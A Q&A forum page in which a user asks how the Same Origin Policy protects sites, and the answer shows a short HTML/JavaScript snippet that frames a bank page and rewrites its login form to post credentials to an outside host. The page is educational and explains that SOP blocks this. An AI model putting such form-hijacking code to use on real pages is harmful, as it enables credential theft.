Home/ Questions/Q 9221987
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-18T03:42:29+00:00

I’ve read about Same Origin Policy , but for a better understanding of the

  • 0

I’ve read about Same Origin Policy, but for a better understanding of the matter: could anyone please write a simple code (in any language) that will demonstrate an attack that SOP stops?

How was it possible to attack someone before SOP came about?

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team
    <iframe id="bank" src="https://yourbank.example"></iframe>

<script>
    window.onload = function() {
        document.getElementById('bank').contentWindow.document.forms[0].action =
            'http://example.com';
    };
</script>

    The JavaScript code changes the form’s action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank.

    If I set up a PHP script on my server that redirects you to your bank, you won’t even notice it.

    With Same Origin Policy, this attack isn’t possible. A site on my domain cannot read or modify the contents of the bank’s website.

    • 0